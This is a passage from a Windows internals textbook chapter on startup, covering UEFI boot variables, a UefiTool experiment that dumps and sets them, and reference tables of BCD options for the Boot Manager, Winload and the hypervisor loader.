device and file path of the Boot Manager, and some optional data. Windows uses the optional data to
store the GUID of the BCD object that describes itself.
Note The optional data could include any other boot options, which the Boot Manager will
parse at later stages. This allows the configuration of the Boot Manager from UEFI variables
without using the Windows Registry at all.
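The Boot#### layout just described (a description string, the device and file path of the Boot Manager, and optional data) follows the EFI_LOAD_OPTION structure from the UEFI specification. A minimal parser sketch in Python, assuming the variable data is available as raw bytes (for example, from a UefiTool dump); the description is located simply by scanning for its UTF-16 terminator:

```python
import struct

def parse_efi_load_option(data: bytes) -> dict:
    """Minimal parser for an EFI_LOAD_OPTION (Boot#### variable data).

    Layout: Attributes (UINT32), FilePathListLength (UINT16),
    Description (null-terminated UTF-16LE string), FilePathList,
    then OptionalData up to the end of the variable.
    """
    attributes, fp_len = struct.unpack_from("<IH", data, 0)
    # Locate the two-byte UTF-16LE terminator of the description.
    off = 6
    end = off
    while data[end:end + 2] != b"\x00\x00":
        end += 2
    description = data[off:end].decode("utf-16-le")
    fp_start = end + 2
    return {
        "attributes": attributes,
        "description": description,
        "file_path_list": data[fp_start:fp_start + fp_len],
        "optional_data": data[fp_start + fp_len:],
    }
```

On the Boot0000 entry shown in the experiment below, the description decodes to “Windows Boot Manager” and the optional data carries the BCDOBJECT GUID string that Bootmgr parses at startup.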
EXPERIMENT: Playing with the UEFI boot variables
You can use the UefiTool utility (found in this book’s downloadable resources) to dump all the
UEFI boot variables of your system. To do so, just run the tool in an administrative command
prompt and specify the /enum command-line parameter. (You can launch the command
prompt as administrator by searching cmd in the Cortana search box and selecting Run As
Administrator after right-clicking Command Prompt.) A regular system uses a lot of UEFI vari-
ables. The tool supports filtering all the variables by name and GUID. You can even export all the
variable names and data in a text file using the /out parameter.
Start by dumping all the UEFI variables in a text file:
C:\Tools>UefiTool.exe /enum /out Uefi_Variables.txt
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
Successfully written “Uefi_Variables.txt” file.
You can get the list of UEFI boot variables by using the following filter:
C:\Tools>UefiTool.exe /enum Boot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
EFI Variable “BootCurrent”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x06 ( BS RT )
Data size : 2 bytes
Data:
00 00
|
EFI Variable “Boot0002”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 78 bytes
Data:
01 00 00 00 2C 00 55 00 53 00 42 00 20 00 53 00 | , U S B S
74 00 6F 00 72 00 61 00 67 00 65 00 00 00 04 07 | t o r a g e
14 00 67 D5 81 A8 B0 6C EE 4E 84 35 2E 72 D3 3E | gü¿lNä5.r>
45 B5 04 06 14 00 71 00 67 50 8F 47 E7 4B AD 13 | Eq gPÅGK¡
87 54 F3 79 C6 2F 7F FF 04 00 55 53 42 00 | çT≤y/ USB
EFI Variable “Boot0000”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 300 bytes
Data:
01 00 00 00 74 00 57 00 69 00 6E 00 64 00 6F 00 | t W I n d o
77 00 73 00 20 00 42 00 6F 00 6F 00 74 00 20 00 | w s B o o t
4D 00 61 00 6E 00 61 00 67 00 65 00 72 00 00 00 | M a n a g e r
04 01 2A 00 02 00 00 00 00 A0 0F 00 00 00 00 00 | * á
00 98 0F 00 00 00 00 00 84 C4 AF 4D 52 3B 80 44 | ÿ ä»MR;ÇD
98 DF 2C A4 93 AB 30 B0 02 02 04 04 46 00 5C 00 | ÿ,ñô½0F \
45 00 46 00 49 00 5C 00 4D 00 69 00 63 00 72 00 | E F I \ M i c r
6F 00 73 00 6F 00 66 00 74 00 5C 00 42 00 6F 00 | o s o f t \ B o
6F 00 74 00 5C 00 62 00 6F 00 6F 00 74 00 6D 00 | o t \ b o o t m
67 00 66 00 77 00 2E 00 65 00 66 00 69 00 00 00 | g f w . e f i
7F FF 04 00 57 49 4E 44 4F 57 53 00 01 00 00 00 | WINDOWS
88 00 00 00 78 00 00 00 42 00 43 00 44 00 4F 00 | ê x B C D O
42 00 4A 00 45 00 43 00 54 00 3D 00 7B 00 39 00 | B J E C T = { 9
64 00 65 00 61 00 38 00 36 00 32 00 63 00 2D 00 | d e a 8 6 2 c -
35 00 63 00 64 00 64 00 2D 00 34 00 65 00 37 00 | 5 c d d - 4 e 7
30 00 2D 00 61 00 63 00 63 00 31 00 2D 00 66 00 | 0 - a c c 1 - f
33 00 32 00 62 00 33 00 34 00 34 00 64 00 34 00 | 3 2 b 3 4 4 d 4
37 00 39 00 35 00 7D 00 00 00 6F 00 01 00 00 00 | 7 9 5 } o
10 00 00 00 04 00 00 00 7F FF 04 00
|
EFI Variable "BootOrder"
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 8 bytes
Data:
02 00 00 00 01 00 03 00
|
<Full output cut for space reasons>
The tool can even interpret the content of each boot variable. You can launch it using the
/enumboot parameter:
C:\Tools>UefiTool.exe /enumboot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
System Boot Configuration
Number of the Boot entries: 4
Current active entry: 0
Order: 2, 0, 1, 3
Boot Entry #2
Type: Active
Description: USB Storage
Boot Entry #0
Type: Active
Description: Windows Boot Manager
Path: Harddisk0\Partition2 [LBA: 0xFA000]\\EFI\Microsoft\Boot\bootmgfw.efi
OS Boot Options: BCDOBJECT={9dea862c-5cdd-4e70-acc1-f32b344d4795}
Boot Entry #1
Type: Active
Description: Internal Storage
Boot Entry #3
Type: Active
Description: PXE Network
When the tool is able to parse the boot path, it prints the relative Path line (the same applies
for the Winload OS load options). The UEFI specifications define different interpretations for
the path field of a boot entry, which are dependent on the hardware interface. You can change
your system boot order by simply setting the value of the BootOrder variable, or by using the
/setbootorder command-line parameter. Keep in mind that this could invalidate the BitLocker
Volume master key. (We explain this concept later in this chapter in the “Measured Boot” section):
C:\Tools>UefiTool.exe /setvar bootorder {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
0300020000000100
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: YES
Warning, The "bootorder" firmware variable already exist.
Overwriting it could potentially invalidate the system Bitlocker Volume Master Key.
Make sure that you have made a copy of the System volume Recovery Key.
Are you really sure that you would like to continue and overwrite its content? [Y/N] y
The "bootorder" firmware variable has been successfully written.
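The BootOrder variable manipulated above is just a packed array of little-endian UINT16 boot-entry numbers, so its value can be decoded in a couple of lines (here using the raw bytes from the earlier dump):

```python
import struct

raw = bytes.fromhex("0200000001000300")  # BootOrder variable data
count = len(raw) // 2                    # one UINT16 per boot entry
order = list(struct.unpack("<%dH" % count, raw))
print(order)  # [2, 0, 1, 3], matching the Order line reported by UefiTool
```

Writing a new order, as the /setvar example does, is just the reverse packing of the desired entry numbers.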
After the Application Parameters data structure has been built and all the boot paths retrieved
(\EFI\Microsoft\Boot is the main working directory), the Boot Manager opens and parses the Boot
Configuration Data file. This file internally is a registry hive that contains all the boot application de-
scriptors and is usually mapped in an HKLM\BCD00000000 virtual key after the system has completely
started. The Boot Manager uses the boot library to open and read the BCD file. The library uses EFI ser-
vices to read and write physical sectors from the hard disk and, at the time of this writing, implements
a light version of various file systems, such as NTFS, FAT, ExFAT, UDFS, El Torito, and virtual file systems
that support Network Boot I/O, VMBus I/O (for Hyper-V virtual machines), and WIM images I/O. The
Boot Configuration Data hive is parsed, the BCD object that describes the Boot Manager is located
(through its GUID), and all the entries that represent boot arguments are added to the startup section
of the Application Parameters data structure. Entries in the BCD can include optional arguments that
Bootmgr, Winload, and other components involved in the boot process interpret. Table 12-2 contains
a list of these options and their effects for Bootmgr, Table 12-3 shows a list of BCD options available to
all boot applications, and Table 12-4 shows BCD options for the Windows boot loader. Table 12-5 shows
BCD options that control the execution of the Windows Hypervisor.
TABLE 12-2 BCD options for the Windows Boot Manager (Bootmgr)
Readable name
Values
BCD Element Code1
Meaning
bcdfilepath
Path
BCD_FILEPATH
Points to the BCD (usually \Boot\BCD) file on
the disk.
displaybootmenu
Boolean
DISPLAY_BOOT_MENU
Determines whether the Boot Manager
shows the boot menu or picks the default
entry automatically.
noerrordisplay
Boolean
NO_ERROR_DISPLAY
Silences the output of errors encountered by
the Boot Manager.
resume
Boolean
ATTEMPT_RESUME
Specifies whether resuming from hiberna-
tion should be attempted. This option is
automatically set when Windows hibernates.
timeout
Seconds
TIMEOUT
Number of seconds that the Boot Manager
should wait before choosing the default entry.
resumeobject
GUID
RESUME_OBJECT
Identifier for which boot application
should be used to resume the system after
hibernation.
displayorder
List
DISPLAY_ORDER
Definition of the Boot Manager’s display
order list.
toolsdisplayorder
List
TOOLS_DISPLAY_ORDER
Definition of the Boot Manager’s tool display
order list.
bootsequence
List
BOOT_SEQUENCE
Definition of the one-time boot sequence.
default
GUID
DEFAULT_OBJECT
The default boot entry to launch.
customactions
List
CUSTOM_ACTIONS_LIST
Definition of custom actions to take when
a specific keyboard sequence has been
entered.
processcustomactionsfirst
Boolean
PROCESS_CUSTOM
_ACTIONS_FIRST
Specifies whether the Boot Manager
should run custom actions prior to the
boot sequence.
bcddevice
GUID
BCD_DEVICE
Device ID of where the BCD store is located.
hiberboot
Boolean
HIBERBOOT
Indicates whether this boot was a hybrid boot.
fverecoveryurl
String
FVE_RECOVERY_URL
Specifies the BitLocker recovery URL string.
fverecoverymessage
String
FVE_RECOVERY
_MESSAGE
Specifies the BitLocker recovery message
string.
flightedbootmgr
Boolean
BOOT_FLIGHT
_BOOTMGR
Specifies whether execution should proceed
through a flighted Bootmgr.
1 All the Windows Boot Manager BCD element codes start with BCDE_BOOTMGR_TYPE, but that has been omitted due to limited space.
TABLE 12-3 BCD library options for boot applications (valid for all object types)
Readable Name
Values
BCD Element Code2
Meaning
advancedoptions
Boolean
DISPLAY_ADVANCED
_OPTIONS
If false, executes the default behavior of
launching the auto-recovery command
boot entry when the boot fails; otherwise,
displays the boot error and offers the user
the advanced boot option menu associated
with the boot entry. This is equivalent to
pressing F8.
avoidlowmemory
Integer
AVOID_LOW_PHYSICAL
_MEMORY
Forces physical addresses below the speci-
fied value to be avoided by the boot loader
as much as possible. Sometimes required
on legacy devices (such as ISA) where only
memory below 16 MB is usable or visible.
badmemoryaccess
Boolean
ALLOW_BAD_MEMORY
_ACCESS
Forces usage of memory pages in the Bad
Page List (see Part 1, Chapter 5, “Memory
management,” for more information on the
page lists).
badmemorylist
Array of page frame
numbers (PFNs)
BAD_MEMORY_LIST
Specifies a list of physical pages on the
system that are known to be bad because
of faulty RAM.
baudrate
Baud rate in bps
DEBUGGER_BAUDRATE
Specifies an override for the default baud
rate (19200) at which a remote kernel debug-
ger host will connect through a serial port.
bootdebug
Boolean
DEBUGGER_ENABLED
Enables remote boot debugging for the
boot loader. With this option enabled, you
can use Kd.exe or Windbg.exe to connect to
the boot loader.
bootems
Boolean
EMS_ENABLED
Causes Windows to enable Emergency
Management Services (EMS) for boot appli-
cations, which reports boot information and
accepts system management commands
through a serial port.
busparams
String
DEBUGGER_BUS
_PARAMETERS
If a physical PCI debugging device is used
to provide kernel debugging, specifies the
PCI bus, function, and device number (or the
ACPI DBG table index) for the device.
channel
Channel between 0
and 62
DEBUGGER_1394
_CHANNEL
Used in conjunction with <debugtype> 1394
to specify the IEEE 1394 channel through
which kernel debugging communications
will flow.
configaccesspolicy
Default,
DisallowMmConfig
CONFIG_ACCESS
_POLICY
Configures whether the system uses
memory-mapped I/O to access the PCI
manufacturer’s configuration space or falls
back to using the HAL’s I/O port access rou-
tines. Can sometimes be helpful in solving
platform device problems.
debugaddress
Hardware address
DEBUGGER_PORT
_ADDRESS
Specifies the hardware address of the serial
(COM) port used for debugging.
debugport
COM port number
DEBUGGER_PORT
_NUMBER
Specifies an override for the default serial
port (usually COM2 on systems with at least
two serial ports) to which a remote kernel
debugger host is connected.
debugstart
Active, AutoEnable,
Disable
DEBUGGER_START
_POLICY
Specifies settings for the debugger when ker-
nel debugging is enabled. AutoEnable enables
the debugger when a breakpoint or kernel
exception, including kernel crashes, occurs.
debugtype
Serial, 1394, USB, or Net
DEBUGGER_TYPE
Specifies whether kernel debugging will be
communicated through a serial, FireWire (IEEE
1394), USB, or Ethernet port. (The default is
serial.)
hostip
Ip address
DEBUGGER_NET
_HOST_IP
Specifies the target IP address to connect
to when the kernel debugger is enabled
through Ethernet.
port
Integer
DEBUGGER_NET_PORT
Specifies the target port number to connect
to when the kernel debugger is enabled
through Ethernet.
key
String
DEBUGGER_NET_KEY
Specifies the encryption key used for en-
crypting debugger packets while using the
kernel Debugger through Ethernet.
emsbaudrate
Baud rate in bps
EMS_BAUDRATE
Specifies the baud rate to use for EMS.
emsport
COM port number
EMS_PORT_NUMBER
Specifies the serial (COM) port to use for EMS.
extendedinput
Boolean
CONSOLE_EXTENDED
_INPUT
Enables boot applications to leverage BIOS
support for extended console input.
keyringaddress
Physical address
FVE_KEYRING_ADDRESS
Specifies the physical address where the
BitLocker key ring is located.
firstmegabytepolicy
UseNone, UseAll,
UsePrivate
FIRST_MEGABYTE
_POLICY
Specifies how the low 1 MB of physical memory
is consumed by the HAL to mitigate corrup-
tions by the BIOS during power transitions.
fontpath
String
FONT_PATH
Specifies the path of the OEM font that
should be used by the boot application.
graphicsmodedisabled
Boolean
GRAPHICS_MODE
_DISABLED
Disables graphics mode for boot applications.
graphicsresolution
Resolution
GRAPHICS_RESOLUTION
Sets the graphics resolution for boot
applications.
initialconsoleinput
Boolean
INITIAL_CONSOLE
_INPUT
Specifies an initial character that the system
inserts into the PC/ AT keyboard input buffer.
integrityservices
Default, Disable, Enable
SI_POLICY
Enables or disables code integrity ser-
vices, which are used by Kernel Mode Code
Signing. Default is Enabled.
locale
Localization string
PREFERRED_LOCALE
Sets the locale for the boot application (such
as EN-US).
noumex
Boolean
DEBUGGER_IGNORE_
USERMODE_EXCEPTIONS
Disables user-mode exceptions when kernel
debugging is enabled. If you experience
system hangs (freezes) when booting in de-
bugging mode, try enabling this option.
recoveryenabled
Boolean
AUTO_RECOVERY
_ENABLED
Enables the recovery sequence, if any. Used
by fresh installations of Windows to pres-
ent the Windows PE-based Startup And
Recovery interface.
recoverysequence
List
RECOVERY_SEQUENCE
Defines the recovery sequence (described
earlier).
relocatephysical
Physical address
RELOCATE_PHYSICAL
_MEMORY
Relocates an automatically selected NUMA
node’s physical memory to the specified
physical address.
targetname
String
DEBUGGER_USB
_TARGETNAME
Defines the target name for the USB debug-
ger when used with USB2 or USB3 debug-
ging (debugtype is set to USB).
testsigning
Boolean
ALLOW_PRERELEASE
_SIGNATURES
Enables test-signing mode, which allows
driver developers to load locally signed
64-bit drivers. This option results in a water-
marked desktop.
truncatememory
Address in bytes
TRUNCATE_PHYSICAL
_MEMORY
Disregards physical memory above the
specified physical address.
2 All the BCD elements codes for Boot Applications start with BCDE_LIBRARY_TYPE, but that has been omitted due to limited space.
TABLE 12-4 BCD options for the Windows OS Loader (Winload)
BCD Element
Values
BCD Element Code3
Meaning
bootlog | Boolean | LOG_INITIALIZATION | Causes Windows to write a log of the boot to the file %SystemRoot%\Ntbtlog.txt.
bootstatuspolicy | DisplayAllFailures, IgnoreAllFailures, IgnoreShutdownFailures, IgnoreBootFailures | BOOT_STATUS_POLICY | Overrides the system's default behavior of offering the user a troubleshooting boot menu if the system didn't complete the previous boot or shutdown.
bootux | Disabled, Basic, Standard | BOOTUX_POLICY | Defines the boot graphics user experience that the user will see. Disabled means that no graphics will be seen during boot time (only a black screen), while Basic will display only a progress bar during load. Standard displays the usual Windows logo animation during boot.
bootmenupolicy | Legacy, Standard | BOOT_MENU_POLICY | Specifies the type of boot menu to show in case of multiple boot entries (see "The boot menu" section later in this chapter).
clustermodeaddressing | Number of processors | CLUSTERMODE_ADDRESSING | Defines the maximum number of processors to include in a single Advanced Programmable Interrupt Controller (APIC) cluster.
configflags | Flags | PROCESSOR_CONFIGURATION_FLAGS | Specifies processor-specific configuration flags.
CHAPTER 12
Startup and shutdown
793
dbgtransport | Transport image name | DBG_TRANSPORT_PATH | Overrides using one of the default kernel debugging transports (Kdcom.dll, Kd1394, Kdusb.dll) and instead uses the given file, permitting specialized debugging transports to be used that are not typically supported by Windows.
debug | Boolean | KERNEL_DEBUGGER_ENABLED | Enables kernel-mode debugging.
detecthal | Boolean | DETECT_KERNEL_AND_HAL | Enables the dynamic detection of the HAL.
driverloadfailurepolicy | Fatal, UseErrorControl | DRIVER_LOAD_FAILURE_POLICY | Describes the loader behavior to use when a boot driver has failed to load. Fatal will prevent booting, whereas UseErrorControl causes the system to honor a driver's default error behavior, specified in its service key.
ems | Boolean | KERNEL_EMS_ENABLED | Instructs the kernel to use EMS as well. (If only bootems is used, only the boot loader will use EMS.)
evstore | String | EVSTORE | Stores the location of a boot preloaded hive.
groupaware | Boolean | FORCE_GROUP_AWARENESS | Forces the system to use groups other than zero when associating the group seed to new processes. Used only on 64-bit Windows.
groupsize | Integer | GROUP_SIZE | Forces the maximum number of logical processors that can be part of a group (maximum of 64). Can be used to force groups to be created on a system that would normally not require them to exist. Must be a power of 2 and is used only on 64-bit Windows.
hal | HAL image name | HAL_PATH | Overrides the default file name for the HAL image (Hal.dll). This option can be useful when booting a combination of a checked HAL and checked kernel (requires specifying the kernel element as well).
halbreakpoint | Boolean | DEBUGGER_HAL_BREAKPOINT | Causes the HAL to stop at a breakpoint early in HAL initialization. The first thing the Windows kernel does when it initializes is to initialize the HAL, so this breakpoint is the earliest one possible (unless boot debugging is used). If the switch is used without the /DEBUG switch, the system will present a blue screen with a STOP code of 0x00000078 (PHASE0_EXCEPTION).
novesa | Boolean | DISABLE_VESA_BIOS | Disables the usage of VESA display modes.
optionsedit | Boolean | OPTIONS_EDIT_ONE_TIME | Enables the options editor in the Boot Manager. With this option, Boot Manager allows the user to interactively set on-demand command-line options and switches for the current boot. This is equivalent to pressing F10.
osdevice | GUID | OS_DEVICE | Specifies the device on which the operating system is installed.
pae | Default, ForceEnable, ForceDisable | PAE_POLICY | Default allows the boot loader to determine whether the system supports PAE and loads the PAE kernel. ForceEnable forces this behavior, while ForceDisable forces the loader to load the non-PAE version of the Windows kernel, even if the system is detected as supporting x86 PAEs and has more than 4 GB of physical memory. However, non-PAE x86 kernels are not supported anymore in Windows 10.
pciexpress | Default, ForceDisable | PCI_EXPRESS_POLICY | Can be used to disable support for PCI Express buses and devices.
perfmem | Size in MB | PERFORMANCE_DATA_MEMORY | Size of the buffer to allocate for performance data logging. This option acts similarly to the removememory element, since it prevents Windows from seeing the size specified as available memory.
quietboot | Boolean | DISABLE_BOOT_DISPLAY | Instructs Windows not to initialize the VGA video driver responsible for presenting bitmapped graphics during the boot process. The driver is used to display boot progress information, so disabling it disables the ability of Windows to show this information.
ramdiskimagelength | Length in bytes | RAMDISK_IMAGE_LENGTH | Size of the ramdisk specified.
ramdiskimageoffset | Offset in bytes | RAMDISK_IMAGE_OFFSET | If the ramdisk contains other data (such as a header) before the virtual file system, instructs the boot loader where to start reading the ramdisk file from.
ramdisksdipath | Image file name | RAMDISK_SDI_PATH | Specifies the name of the SDI ramdisk to load.
ramdisktftpblocksize | Block size | RAMDISK_TFTP_BLOCK_SIZE | If loading a WIM ramdisk from a network Trivial FTP (TFTP) server, specifies the block size to use.
ramdisktftpclientport | Port number | RAMDISK_TFTP_CLIENT_PORT | If loading a WIM ramdisk from a network TFTP server, specifies the port.
ramdisktftpwindowsize | Window size | RAMDISK_TFTP_WINDOW_SIZE | If loading a WIM ramdisk from a network TFTP server, specifies the window size to use.
removememory | Size in bytes | REMOVE_MEMORY | Specifies an amount of memory Windows won't use.
restrictapiccluster | Cluster number | RESTRICT_APIC_CLUSTER | Defines the largest APIC cluster number to be used by the system.
resumeobject | Object GUID | ASSOCIATED_RESUME_OBJECT | Describes which application to use for resuming from hibernation, typically Winresume.exe.
safeboot | Minimal, Network, DsRepair | SAFEBOOT | Specifies options for a safe-mode boot. Minimal corresponds to safe mode without networking, Network to safe mode with networking, and DsRepair to safe mode with Directory Services Restore mode. (See the "Safe mode" section later in this chapter.)
safebootalternateshell | Boolean | SAFEBOOT_ALTERNATE_SHELL | Tells Windows to use the program specified by the HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell value as the graphical shell rather than the default, which is Windows Explorer. This option is referred to as safe mode with command prompt in the alternate boot menu.
sos | Boolean | SOS | Causes Windows to list the device drivers marked to load at boot time and then to display the system version number (including the build number), amount of physical memory, and number of processors.
systemroot | String | SYSTEM_ROOT | Specifies the path, relative to osdevice, in which the operating system is installed.
targetname | Name | KERNEL_DEBUGGER_USB_TARGETNAME | For USB debugging, assigns a name to the machine that is being debugged.
tpmbootentropy | Default, ForceDisable, ForceEnable | TPM_BOOT_ENTROPY_POLICY | Forces a specific TPM Boot Entropy policy to be selected by the boot loader and passed on to the kernel. TPM Boot Entropy, when used, seeds the kernel's random number generator (RNG) with data obtained from the TPM (if present).
usefirmwarepcisettings | Boolean | USE_FIRMWARE_PCI_SETTINGS | Stops Windows from dynamically assigning IO/IRQ resources to PCI devices and leaves the devices configured by the BIOS. See Microsoft Knowledge Base article 148501 for more information.
uselegacyapicmode | Boolean | USE_LEGACY_APIC_MODE | Forces usage of basic APIC functionality even though the chipset reports extended APIC functionality as present. Used in cases of hardware errata and/or incompatibility.
usephysicaldestination | Boolean | USE_PHYSICAL_DESTINATION | Forces the use of the APIC in physical destination mode.
useplatformclock | Boolean | USE_PLATFORM_CLOCK | Forces usage of the platform's clock source as the system's performance counter.
vga | Boolean | USE_VGA_DRIVER | Forces Windows to use the VGA display driver instead of the third-party high-performance driver.
winpe | Boolean | WINPE | Used by Windows PE, this option causes the configuration manager to load the registry SYSTEM hive as a volatile hive such that changes made to it in memory are not saved back to the hive image.
x2apicpolicy | Disabled, Enabled, Default | X2APIC_POLICY | Specifies whether extended APIC functionality should be used if the chipset supports it. Disabled is equivalent to setting uselegacyapicmode, whereas Enabled forces APIC functionality on even if errata are detected. Default uses the chipset's reported capabilities (unless errata are present).
xsavepolicy | Integer | XSAVEPOLICY | Forces the given XSAVE policy to be loaded from the XSAVE Policy Resource Driver (Hwpolicy.sys).
xsaveaddfeature0-7 | Integer | XSAVEADDFEATURE0-7 | Used while testing support for XSAVE on modern Intel processors; allows for faking that certain processor features are present when, in fact, they are not. This helps increase the size of the CONTEXT structure and confirms that applications work correctly with extended features that might appear in the future. No actual extra functionality will be present, however.
xsaveremovefeature | Integer | XSAVEREMOVEFEATURE | Forces the entered XSAVE feature not to be reported to the kernel, even though the processor supports it.
xsaveprocessorsmask | Integer | XSAVEPROCESSORSMASK | Bitmask of which processors the XSAVE policy should apply to.
xsavedisable | Boolean | XSAVEDISABLE | Turns off support for the XSAVE functionality even though the processor supports it.
3 All the BCD element codes for the Windows OS Loader start with BCDE_OSLOADER_TYPE, but this has been omitted due to limited space.
TABLE 12-5 BCD options for the Windows Hypervisor loader (hvloader)
BCD Element | Values | BCD Element Code4 | Meaning
hypervisorlaunchtype | Off, Auto | HYPERVISOR_LAUNCH_TYPE | Enables loading of the hypervisor on a Hyper-V system or forces it to be disabled.
hypervisordebug | Boolean | HYPERVISOR_DEBUGGER_ENABLED | Enables or disables the Hypervisor Debugger.
hypervisordebugtype | Serial, 1394, None, Net | HYPERVISOR_DEBUGGER_TYPE | Specifies the Hypervisor Debugger type (through a serial port or through an IEEE-1394 or network interface).
hypervisoriommupolicy | Default, Enable, Disable | HYPERVISOR_IOMMU_POLICY | Enables or disables the hypervisor DMA Guard, a feature that blocks direct memory access (DMA) for all hot-pluggable PCI ports until a user logs in to Windows.
hypervisormsrfilterpolicy | Disable, Enable | HYPERVISOR_MSR_FILTER_POLICY | Controls whether the root partition is allowed to access restricted MSRs (model-specific registers).
hypervisormmionxpolicy | Disable, Enable | HYPERVISOR_MMIO_NX_POLICY | Enables or disables the No-Execute (NX) protection for UEFI runtime service code and data memory regions.
hypervisorenforcedcodeintegrity | Disable, Enable, Strict | HYPERVISOR_ENFORCED_CODE_INTEGRITY | Enables or disables Hypervisor Enforced Code Integrity (HVCI), a feature that prevents the root partition kernel from allocating unsigned executable memory pages.
hypervisorschedulertype | Classic, Core, Root | HYPERVISOR_SCHEDULER_TYPE | Specifies the hypervisor's partitions scheduler type.
hypervisordisableslat | Boolean | HYPERVISOR_SLAT_DISABLED | Forces the hypervisor to ignore the presence of the second layer address translation (SLAT) feature if supported by the processor.
hypervisornumproc | Integer | HYPERVISOR_NUM_PROC | Specifies the maximum number of logical processors available to the hypervisor.
hypervisorrootprocpernode | Integer | HYPERVISOR_ROOT_PROC_PER_NODE | Specifies the total number of root virtual processors per node.
hypervisorrootproc | Integer | HYPERVISOR_ROOT_PROC | Specifies the maximum number of virtual processors in the root partition.
hypervisorbaudrate | Baud rate in bps | HYPERVISOR_DEBUGGER_BAUDRATE | If using serial hypervisor debugging, specifies the baud rate to use.
hypervisorchannel | Channel number from 0 to 62 | HYPERVISOR_DEBUGGER_1394_CHANNEL | If using FireWire (IEEE 1394) hypervisor debugging, specifies the channel number to use.
hypervisordebugport | COM port number | HYPERVISOR_DEBUGGER_PORT_NUMBER | If using serial hypervisor debugging, specifies the COM port to use.
hypervisoruselargevtlb | Boolean | HYPERVISOR_USE_LARGE_VTLB | Enables the hypervisor to use a larger number of virtual TLB entries.
hypervisorhostip | IP address (binary format) | HYPERVISOR_DEBUGGER_NET_HOST_IP | Specifies the IP address of the target machine (the debugger) used in hypervisor network debugging.
hypervisorhostport | Integer | HYPERVISOR_DEBUGGER_NET_HOST_PORT | Specifies the network port used in hypervisor network debugging.
hypervisorusekey | String | HYPERVISOR_DEBUGGER_NET_KEY | Specifies the encryption key used for encrypting the debug packets sent through the wire.
hypervisorbusparams | String | HYPERVISOR_DEBUGGER_BUSPARAMS | Specifies the bus, device, and function numbers of the network adapter used for hypervisor debugging.
hypervisordhcp | Boolean | HYPERVISOR_DEBUGGER_NET_DHCP | Specifies whether the Hypervisor Debugger should use DHCP for getting the network interface IP address.
4 All the BCD element codes for the Windows Hypervisor Loader start with BCDE_OSLOADER_TYPE, but this has been omitted due to limited space.
All the entries in the BCD store play a key role in the startup sequence. Each boot entry (a boot entry is a BCD object) lists all of its boot options, which are stored in the hive as registry subkeys (as shown in Figure 12-5). These options are called BCD elements. The Windows Boot Manager is able to add or remove any boot option, either in the physical hive or only in memory. This is important because, as we describe later in the section "The boot menu," not all the BCD options need to reside in the physical hive.
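As a side note, each BCD element code is itself structured. Per Microsoft's documented BCD element data-type layout (assumed here from that documentation, not stated in this chapter), the top 4 bits of the 32-bit code select the class (library, application, device), the next 4 bits select the value format (boolean, integer, string, and so on), and the low 24 bits hold the subtype. A minimal Python sketch, with abbreviated name tables:

```python
# Sketch: split a 32-bit BCD element code into its documented fields.
# Layout assumed from Microsoft's BCD element data-type reference:
# bits 28-31 = class, bits 24-27 = format, bits 0-23 = subtype.

BCD_CLASSES = {1: "Library", 2: "Application", 3: "Device", 5: "OEM"}
BCD_FORMATS = {1: "Device", 2: "String", 3: "Object", 4: "ObjectList",
               5: "Integer", 6: "Boolean", 7: "IntegerList"}

def decode_bcd_element(code: int) -> dict:
    """Decode a BCD element code into class, format, and subtype."""
    return {
        "class": BCD_CLASSES.get(code >> 28, "Unknown"),
        "format": BCD_FORMATS.get((code >> 24) & 0xF, "Unknown"),
        "subtype": code & 0x00FFFFFF,
    }
```

For example, 0x16000071 (the multi-boot element code quoted later in this chapter) decodes to a library-class boolean with subtype 0x71.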
If the Boot Configuration Data hive is corrupt, or if some error has occurred while parsing its boot
entries, the Boot Manager retries the operation using the Recovery BCD hive. The Recovery BCD hive is
normally stored in \EFI\Microsoft\Recovery\BCD. The system could be configured for direct use of this
store, skipping the normal one, via the recoverybcd parameter (stored in the UEFI boot variable) or via
the Bootstat.log file.
FIGURE 12-5 An example screenshot of the Windows Boot Manager's BCD objects and their associated boot options (BCD elements).
The system is ready to load the Secure Boot policies, show the boot menu (if needed), and launch
the boot application. The list of boot certificates that the firmware can or cannot trust is located in the
db and dbx UEFI authenticated variables. The code integrity boot library reads and parses the UEFI
variables, but these control only whether a particular boot manager module can be loaded. Once the
Windows Boot Manager is launched, it enables you to further customize or extend the UEFI-supplied
Secure Boot configuration with a Microsoft-provided certificates list. The Secure Boot policy file (stored
in \EFI\Microsoft\Boot\SecureBootPolicy.p7b), the platform manifest policies files (.pm files), and the
supplemental policies (.pol files) are parsed and merged with the policies stored in the UEFI variables.
Because the kernel code integrity engine ultimately takes over, the additional policies contain OS-
specific information and certificates. In this way, a secure edition of Windows (like the S version) could
verify multiple certificates without consuming precious UEFI resources. This creates the root of trust be-
cause the files that specify new customized certificates lists are signed by a digital certificate contained
in the UEFI allowed signatures database.
If not disabled by boot options (nointegritycheck or testsigning) or by a Secure Boot policy, the Boot
Manager performs a self-verification of its own integrity: it opens its own file from the hard disk and
validates its digital signature. If Secure Boot is on, the signing chain is validated against the Secure Boot
signing policies.
The Boot Manager initializes the Boot Debugger and checks whether it needs to display an OEM
bitmap (through the BGRT system ACPI table). If so, it clears the screen and shows the logo. If Windows
has enabled the BCD setting to inform Bootmgr of a hibernation resume (or of a hybrid boot), this
shortcuts the boot process by launching the Windows Resume Application, Winresume.efi, which will
read the contents of the hibernation file into memory and transfer control to code in the kernel that
resumes a hibernated system. That code is responsible for restarting drivers that were active when the
system was shut down. Hiberfil.sys is valid only if the last computer shutdown was a hibernation or a
